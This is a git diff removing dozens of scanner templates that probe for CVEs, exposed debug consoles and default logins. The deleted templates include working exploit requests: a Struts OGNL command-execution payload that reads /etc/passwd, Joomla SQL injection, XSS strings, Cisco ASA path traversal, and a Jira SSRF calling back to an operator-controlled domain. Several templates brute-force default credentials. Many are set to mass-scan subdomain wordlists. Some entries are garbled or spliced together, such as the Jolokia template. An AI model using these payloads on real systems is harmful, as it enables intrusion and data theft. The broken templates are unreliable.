- name: Nginx Remote Integer Overflow
- risk: Medium
-params:
- - root: '{{.BaseURL}}'
-variables:
-requests:
- - method: GET
- url: >-
- {{.root}}/
- headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- - Range: bytes=-17208,-9223372036854758792
- detections:
- - >-
- StatusCode() == 206 && StringSearch("resHeaders", "Server: nginx") && StringSearch("resBody", "Content-Range")
-references:
- - https://www.cvebase.com/cve/2017/7529
diff --git a/tmp/cve/cve-2017-7921-3072.yaml b/tmp/cve/cve-2017-7921-3072.yaml
deleted file mode 100644
index 1e6d880d78..0000000000
--- a/tmp/cve/cve-2017-7921-3072.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CVE-2017-7921
-info:
- name: Hikvision Authentication Bypass
- author: princechaddha
- severity: high
- description: An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.
- reference: |
- - http://www.hikvision.com/us/about_10805.html
- - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01
- tags: cve,cve2017,auth-bypass
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- words:
- - "application/xml"
- part: header
diff --git a/tmp/cve/cve-2017-8917-3076.yaml b/tmp/cve/cve-2017-8917-3076.yaml
deleted file mode 100644
index 4420a7d72a..0000000000
--- a/tmp/cve/cve-2017-8917-3076.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: CVE-2017-8917
-info:
- name: Joomla SQL Injection
- author: princechaddha
- severity: high
- description: SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors.
- reference: https://www.cvedetails.com/cve/CVE-2017-8917/
- tags: cve,cve2017,joomla,sqli
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1) HTTP/1.1
- Host: {{Subdomains}}
- matchers:
- - type: word
- words:
- - "cf79ae6addba60ad018347359bd144d2"
- part: body
diff --git a/tmp/cve/cve-2017-9140-3082.yaml b/tmp/cve/cve-2017-9140-3082.yaml
deleted file mode 100644
index 6e1e846be9..0000000000
--- a/tmp/cve/cve-2017-9140-3082.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2017-9140
-info:
- name: Reflected XSS - Telerik Reporting Module
- author: dhiyaneshDk
- severity: medium
- tags: cve,cve2017,xss,telerik
- description: Cross-site scripting (XSS) vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
- reference: https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1) HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - '#000000"onload="prompt(1)'
- - 'Telerik.ReportViewer.axd?name=Resources'
- condition: and
diff --git a/tmp/cve/cve-2017-9288-3085.yaml b/tmp/cve/cve-2017-9288-3085.yaml
deleted file mode 100644
index b18602d1a9..0000000000
--- a/tmp/cve/cve-2017-9288-3085.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2017-9288
-info:
- name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter).
- reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288
- tags: cve,cve2017,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-9506-3093.yaml b/tmp/cve/cve-2017-9506-3093.yaml
deleted file mode 100644
index 37dde7c890..0000000000
--- a/tmp/cve/cve-2017-9506-3093.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: CVE-2017-9506
-info:
- name: Jira IconURIServlet SSRF
- author: pdteam
- severity: high
- description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
- reference: |
- - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
- - https://ecosystem.atlassian.net/browse/OAUTH-344
- - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
- tags: cve,cve2017,atlassian,jira,ssrf,oob
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{Host}}.{{Port}}.{{Subdomains}}.2017.9506.{{MY-DOMAIN}} HTTP/1.1
- Host: {{Subdomains}}
- Origin: https://{{Subdomains}}
- Connection: close
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
- Accept-Language: en-US,en;q=0.9
diff --git a/tmp/cve/cve-2017-9791-3096.yaml b/tmp/cve/cve-2017-9791-3096.yaml
deleted file mode 100644
index eab25261c7..0000000000
--- a/tmp/cve/cve-2017-9791-3096.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: CVE-2017-9791
-info:
- name: Apache Struts2 S2-053 RCE
- author: pikpikcu
- severity: critical
- description: The Struts 1 plugin in Apache Struts 2.1.x and 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.
- reference: |
- - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html
- - http://struts.apache.org/docs/s2-048.html
- tags: cve,cve2017,apache,rce
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /integration/saveGangster.action HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Content-Type: text/html"
- part: header
- - type: regex
- regex:
- - "root:[x*]:0:0"
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-9805-3102.yaml b/tmp/cve/cve-2017-9805-3102.yaml
deleted file mode 100644
index b2ce94387a..0000000000
--- a/tmp/cve/cve-2017-9805-3102.yaml
+++ /dev/null
@@ -1,88 +0,0 @@
-id: CVE-2017-9805 1
-info:
- name: Apache Struts2 S2-052 RCE
- author: pikpikcu
- severity: critical
- description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.
- reference: |
- - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html
- - https://struts.apache.org/docs/s2-052.html
- tags: cve,cve2017,apache,rce,struts
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /struts2-rest-showcase/orders/3 HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/xml
-
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Debugging information"
- - "com.thoughtworks.xstream.converters.collections.MapConverter"
- condition: and
- - type: status
- status:
- - 500
diff --git a/tmp/cve/cve-2017-9822-3107.yaml b/tmp/cve/cve-2017-9822-3107.yaml
deleted file mode 100644
index bd2fcfe3d2..0000000000
--- a/tmp/cve/cve-2017-9822-3107.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: CVE-2017-9822
-info:
- name: DotNetNuke Cookie Deserialization Remote Code Execution (RCE)
- author: milo2012
- severity: high
- description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE)
- tags: cve,cve2017,dotnetnuke,bypass
- reference: https://github.com/murataydemir/CVE-2017-9822
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /__ HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
- Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
- Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
- Accept-Encoding: gzip, deflate
- X-Requested-With: XMLHttpRequest
- Connection: close
- Cookie: dnn_IsMobile=False; DNNPersonalization=- WriteFileC:\Windows\win.ini
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '[extensions]'
- - 'for 16-bit app support'
- part: body
- condition: and
- - type: status
- status:
- - 404
diff --git a/tmp/cve/cve-2017-9841-3114.yaml b/tmp/cve/cve-2017-9841-3114.yaml
deleted file mode 100644
index ec7da2b5f4..0000000000
--- a/tmp/cve/cve-2017-9841-3114.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: cve-2017-9841
-info:
- name: PHPUnit Code Injection
- risk: Critical
-params:
- - root: '{{.BaseURL}}'
-variables:
- - endpoint: |
- sites/all/libraries/mailchimp/vendor/phpunit/phpunit/phpunit
- vendor/phpunit/phpunit/phpunit
- laravel_api/vendor/phpunit/phpunit/phpunit
- api/vendor/phpunit/phpunit/phpunit
- apps/vendor/phpunit/phpunit/phpunit
- backup/vendor/phpunit/phpunit/phpunit
- oldsite/vendor/phpunit/phpunit/phpunit
- lib/phpunit/phpunit/phpunit
- modules/vendor/phpunit/phpunit/phpunit
- old/vendor/phpunit/phpunit/phpunit
- zend/vendor/phpunit/phpunit/phpunit
- yii/vendor/phpunit/phpunit/phpunit
-requests:
- - method: GET
- url: >-
- {{.root}}/{{.endpoint}}
- headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- detections:
- - >-
- StatusCode() == 200 && StringSearch("resBody", "this version of phpunit requires php 5")
-references:
- - https://www.cvebase.com/cve/2017/9841
diff --git a/tmp/cve/cve-2018-0101.yaml b/tmp/cve/cve-2018-0101.yaml
deleted file mode 100644
index 617dcbd20c..0000000000
--- a/tmp/cve/cve-2018-0101.yaml
+++ /dev/null
@@ -1,47 +0,0 @@
-id: cve-2018-0101
-info:
- name: Cisco ASA Denial-of-Service # Leads to RCE
- author: dwisiswant0
- severity: critical
- reference: https://www.exploit-db.com/exploits/43986
- description: |
- A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated,
- remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that
- the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition.
- tags: cve,cve2018,cisco,dos,rce
-requests:
- - raw:
- - |
- GET / HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
- - |
- POST / HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
- Content-Type: application/x-www-form-urlencoded
- X-Aggregate-Auth: 1
- X-Transcend-Version: 1
- Accept-Encoding: identity
- X-AnyConnect-Platform: linux-64
- X-Support-HTTP-Auth: false
- X-Pad: 0000000000000000000000000000000000000000
-
-
-
- A
-
- req-condition: true
- matchers-condition: and
- matchers:
- - type: dsl
- dsl:
- - "status_code_1 == 200"
- - type: dsl
- dsl:
- - "status_code_2 == 500"
- - "status_code_2 == 501"
- - "status_code_2 == 502"
- - "status_code_2 == 503"
- - "status_code_2 == 504"
- condition: or
diff --git a/tmp/cve/cve-2018-0127-3119.yaml b/tmp/cve/cve-2018-0127-3119.yaml
deleted file mode 100644
index 70a9f7b1b0..0000000000
--- a/tmp/cve/cve-2018-0127-3119.yaml
+++ /dev/null
@@ -1,41 +0,0 @@
-id: CVE-2018-0127
-info:
- name: Cisco RV132W and RV134W Router Information Disclosure
- author: jrolf
- severity: critical
- description: A vulnerability in the web interface of Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device, which could lead to the disclosure of confidential information.
- tags: cve,cve2018,cisco,router
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
- cve-id: CVE-2018-0127
- cwe-id: CWE-306
- reference:
- - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2
- - http://www.securitytracker.com/id/1040345
- - http://www.securityfocus.com/bid/102969
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /dumpmdm.cmd HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- part: body
- condition: and
- words:
- - "Dump"
- - "MDM"
- - "cisco"
- - "admin"
diff --git a/tmp/cve/cve-2018-0296-3125.yaml b/tmp/cve/cve-2018-0296-3125.yaml
deleted file mode 100644
index 736d8dd1a0..0000000000
--- a/tmp/cve/cve-2018-0296-3125.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: CVE-2018-0296
-info:
- name: Cisco ASA path traversal vulnerability
- author: organiccrap
- severity: medium
- tags: cve,cve2018,cisco,lfi
- reference: https://github.com/yassineaboukir/CVE-2018-0296
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1
- Host: {{Subdomains}}
- Accept-Encoding: deflate
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "///sessions"
- part: body
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2018-1000129-3131.yaml b/tmp/cve/cve-2018-1000129-3131.yaml
deleted file mode 100644
index 1da5b6f919..0000000000
--- a/tmp/cve/cve-2018-1000129-3131.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: cve-2018-1000129
-info:
- name: Jolokia XSS
- risk: High
-params:
- - root: '{{.BaseURL}}'
-variables:
- - vul: |
- /jolokia/
- /monitoring/json/
-requests:
- - method: GET
- redirect: false
- url: >-
- {{.root}}{{.vul}}read | On | On | '
- part: body
diff --git a/tmp/debug/wamp-xdebug.yaml b/tmp/debug/wamp-xdebug.yaml
deleted file mode 100644
index da6500ed20..0000000000
--- a/tmp/debug/wamp-xdebug.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-info:
- id: wamp-xdebug
- name: WAMP Xdebug - Detect
- author: OpenAI
- description: Template to detect the presence of Xdebug in a WAMP (Windows, Apache, MySQL, PHP) server configuration
- severity: Info
- classification:
- country: any
- tags:
- - wamp
- - xdebug
- - configuration
- - development
-
- matcher-condition: and
-
- requests:
- method: GET
- path:
- - "/?phpinfo=-1"
- description: Attempt to access phpinfo.php page
-
- matchers:
- - pattern: 'xdebug.remote_connect_backOn | On | '
- type: body
- description: Xdebug configuration detected in phpinfo.php page
-
- response:
- - status:
- - 200
- description: Successful response status
diff --git a/tmp/debug/werkzeug-debug.yaml b/tmp/debug/werkzeug-debug.yaml
deleted file mode 100644
index d6a2370278..0000000000
--- a/tmp/debug/werkzeug-debug.yaml
+++ /dev/null
@@ -1,14 +0,0 @@
-id: werkzeug-debug
-info:
- name: werkzeug-debug
- author: notnotnotveg
- severity: informative
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/console"
- matchers:
- - type: word
- words:
- - "Werkzeug"
- part: body
diff --git a/tmp/debug/werkzeug-debugger-detect-11195.yaml b/tmp/debug/werkzeug-debugger-detect-11195.yaml
deleted file mode 100644
index 6ae19f58af..0000000000
--- a/tmp/debug/werkzeug-debugger-detect-11195.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: werkzeug-debugger-detect
-info:
- name: Werkzeug debugger console
- author: pdteam
- severity: info
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /console HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers:
- - type: word
- words:
- - "Interactive Console
"
- part: body
diff --git a/tmp/debug/wordpress-debug-log-11257.yaml b/tmp/debug/wordpress-debug-log-11257.yaml
deleted file mode 100644
index ebfdcab177..0000000000
--- a/tmp/debug/wordpress-debug-log-11257.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: wp-debug-log
-info:
- name: WordPress debug log
- author: geraldino2,@dwisiswant0
- severity: low
- tags: wordpress,log
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/debug.log HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - octet-stream
- - text/plain
- part: header
- condition: or
- - type: regex
- regex:
- - "[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP"
- part: body
- - type: status
- status:
- - 200
diff --git a/tmp/debug/wordpress-debug-log.yaml b/tmp/debug/wordpress-debug-log.yaml
deleted file mode 100644
index cd4938083c..0000000000
--- a/tmp/debug/wordpress-debug-log.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-id: wp-debug-log
-
-info:
- name: WordPress debug log
- author: geraldino2,@dwisiswant0
- severity: low
- tags: wordpress,log
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /wp-content/debug.log HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - octet-stream
- - text/plain
- part: header
- condition: or
-
- - type: regex
- regex:
- - "[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP"
- part: body
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/tmp/debug/xdebug.yaml b/tmp/debug/xdebug.yaml
deleted file mode 100644
index 6bf1620fd4..0000000000
--- a/tmp/debug/xdebug.yaml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: xdebug
-priority: 1
-nuclei_tags:
- - - xdebug
-fingerprint:
- - path: /
- request_method: get
- request_headers: {}
- request_data: ''
- status_code: 0
- headers:
- X-Xdebug-Profile-Filename: /
- keyword: []
- favicon_hash: []
diff --git a/tmp/default/activemq-default-login-45.yaml b/tmp/default/activemq-default-login-45.yaml
deleted file mode 100644
index b9c79fe364..0000000000
--- a/tmp/default/activemq-default-login-45.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: activemq-default-login
-info:
- name: Apache ActiveMQ Default Credentials
- author: pdteam
- severity: medium
- tags: apache,activemq,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /admin/ HTTP/1.1
- Host: {{Subdomains}}
- Authorization: Basic YWRtaW46YWRtaW4=
- matchers:
- - type: word
- words:
- - 'Welcome to the Apache ActiveMQ Console of '
- - 'Broker
'
- condition: and
diff --git a/tmp/default/activemq-default-password.yaml b/tmp/default/activemq-default-password.yaml
deleted file mode 100644
index d795fc0e57..0000000000
--- a/tmp/default/activemq-default-password.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: activemq-default-password
-
-info:
- name: ActiveMQ Default Password
- author: pa55w0rd(www.pa55w0rd.online/)
- severity: high
- verified: true
-
-set:
- admin: "base64('admin:admin')"
- user: "base64('user:user')"
-rules:
- r0:
- request:
- method: GET
- path: /
- expression: response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ!
") && response.body.bcontains(b"Apache ActiveMQ")
- stop_if_mismatch: true
- r1:
- request:
- method: GET
- path: /admin/
- headers:
- Authorization: Basic {{admin}}
- expression: response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"Broker
")
- stop_if_match: true
- r2:
- request:
- method: GET
- path: /admin/
- headers:
- Authorization: Basic {{user}}
- expression: response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"Broker
")
- stop_if_match: true
-expression: r0() && (r1() || r2())
diff --git a/tmp/default/activemq-default-password.yml b/tmp/default/activemq-default-password.yml
deleted file mode 100644
index cd03055719..0000000000
--- a/tmp/default/activemq-default-password.yml
+++ /dev/null
@@ -1,23 +0,0 @@
-name: poc-yaml-activemq-default-password
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /admin/
- expression: response.status == 401 && response.body.bcontains(b"Unauthorized")
- r1:
- request:
- cache: true
- method: GET
- path: /admin/
- headers:
- Authorization: Basic YWRtaW46YWRtaW4=
- expression: response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"Broker
")
-expression: r0() && r1()
-detail:
- author: pa55w0rd(www.pa55w0rd.online/)
- links:
- - https://blog.csdn.net/ge00111/article/details/72765210
diff --git a/tmp/default/adobe-aem-default-credentials.yaml b/tmp/default/adobe-aem-default-credentials.yaml
deleted file mode 100644
index 30b1006bc0..0000000000
--- a/tmp/default/adobe-aem-default-credentials.yaml
+++ /dev/null
@@ -1,65 +0,0 @@
-id: adobe-aem-default-credentials
-
-info:
- name: Adobe AEM Default Credentials
- author: random-robbie
- severity: critical
- tags: aem,default-login,fuzz
-requests:
-
- - payloads:
-
- rr_username:
- - admin
- - grios
- - replication-receiver
- - vgnadmin
- - aparker@geometrixx.info
- - jdoe@geometrixx.info
- - james.devore@spambob.com
- - matt.monroe@mailinator.com
- - aaron.mcdonald@mailinator.com
- - jason.werner@dodgit.com
-
- rr_password:
- - admin
- - password
- - replication-receiver
- - vgnadmin
- - aparker
- - jdoe
- - password
- - password
- - password
- - password
-
- attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
-
- raw:
- - |
- POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
- Accept: text/plain, */*; q=0.01
- Accept-Language: en-US,en;q=0.5
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- X-Requested-With: XMLHttpRequest
- Content-Length: 67
- Origin: {{BaseURL}}
- Referer: {{BaseURL}}/libs/granite/core/content/login.html
- Connection: close
-
- _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- part: header
- words:
- - login-token
- - crx.default
- condition: and
diff --git a/tmp/default/aem-default-login.yaml b/tmp/default/aem-default-login.yaml
deleted file mode 100644
index 30c718c891..0000000000
--- a/tmp/default/aem-default-login.yaml
+++ /dev/null
@@ -1,65 +0,0 @@
-id: aem-default-login
-
-info:
- name: Adobe AEM Default Login
- author: random-robbie
- severity: high
- description: Adobe AEM default login credentials were discovered.
- reference:
- - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- max-request: 8
- shodan-query: http.component:"Adobe Experience Manager"
- tags: aem,default-login,adobe
-
-http:
- - raw:
- - |
- POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Origin: {{BaseURL}}
- Referer: {{BaseURL}}/libs/granite/core/content/login.html
-
- _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true
-
- attack: pitchfork
- payloads:
- aem_user:
- - admin
- - grios
- - replication-receiver
- - vgnadmin
- - author
- - anonymous
- - jdoe@geometrixx.info
- - aparker@geometrixx.info
- aem_pass:
- - admin
- - password
- - replication-receiver
- - vgnadmin
- - author
- - anonymous
- - jdoe
- - aparker
- stop-at-first-match: true
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- part: header
- words:
- - login-token
- - crx.default
- condition: and
-
-# digest: 4a0a004730450220222a3b892a7451300a85043c153a1fbe5d336d8c9f30c474065214bbac5906bc022100981335810687d458df2fb4ca0c7698ec9597777f599956f12f0a62b18f285727:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/alibaba-canal-default-password-261.yaml b/tmp/default/alibaba-canal-default-password-261.yaml
deleted file mode 100644
index e467a7b4bd..0000000000
--- a/tmp/default/alibaba-canal-default-password-261.yaml
+++ /dev/null
